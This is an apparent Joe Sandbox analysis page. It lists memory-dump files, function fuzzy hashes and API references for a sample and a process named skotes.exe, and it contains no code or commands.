Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87da2ee753dab99e5afaac9944339a695ed2f178069765fca9fdb6420d6edf61
Instruction ID: 85dcf65a083b398f43906ae394aaf9ff9ed5dbf88fb5c82649ce1be863dc2f7f
Opcode Fuzzy Hash: 87da2ee753dab99e5afaac9944339a695ed2f178069765fca9fdb6420d6edf61
Instruction Fuzzy Hash: 8F117363F30C255B675C816D8C172BAA5D2EBD815070F533AD866E7284E9A4DE23D290

Function 01028860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 9a92b06eb9fe007dea453e8c0e97995750a53ce5a1de75bea52302bff188cc1c
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: CD110B7F20016143F698862DE8B45B7ABD5EBC522572CC3F7D2C18BB54D2A2A1459500

Function 0101A302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: ceba95a865503723139e9528b8ff0acfb3f5cec28873b31268f219adaf8840d9
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 9CE08C72A22268EBCB14DB9CC904ACAFBFCEB49B00B654096F601D3150C2B4DE00C7D0

Function 0101CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0101CC66

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction ID: 4df27cde71643020f2d8c7b9b3cc05e0e6421a3469c2b7554b3227e14005790c
Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction Fuzzy Hash: 06B1453294028A9FEB15CF68C9807FEBFE5EF55350F1481AAD881EB249D638DD01CB60

Function 00FE2EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00FE2F5F
__Mtx_unlock.LIBCPMT ref: 00FE2FCC
__Mtx_unlock.LIBCPMT ref: 00FE30F5
__Mtx_unlock.LIBCPMT ref: 00FE319B

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: 381da34855b7830cf4b77bc8c35ed405b7e80c83cdd070893c307896ef09a8aa
Instruction ID: 6f36245f1cd0ba32ab85f54da9d29e8faa4c17bdd0aa97700fb4d98b6ddf31cc
Opcode Fuzzy Hash: 381da34855b7830cf4b77bc8c35ed405b7e80c83cdd070893c307896ef09a8aa
Instruction Fuzzy Hash: 7BA1F2B0E012599FDB10DF66CD4876AB7E8FF14324F008169E915D7251EB39EA04EBD1

Analysis Process: skotes.exePID: 1860, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	575
Total number of Limit Nodes:	4

Executed Functions

Function 0098652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0098652A,?,?,?,?,?,00987661), ref: 00986567

Memory Dump Source

Source File: 00000001.00000002.1733994735.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000001.00000002.1733977579.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1733994735.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734054041.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734192369.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734215049.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734229440.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734247166.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734368698.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734387046.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.1734408867.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
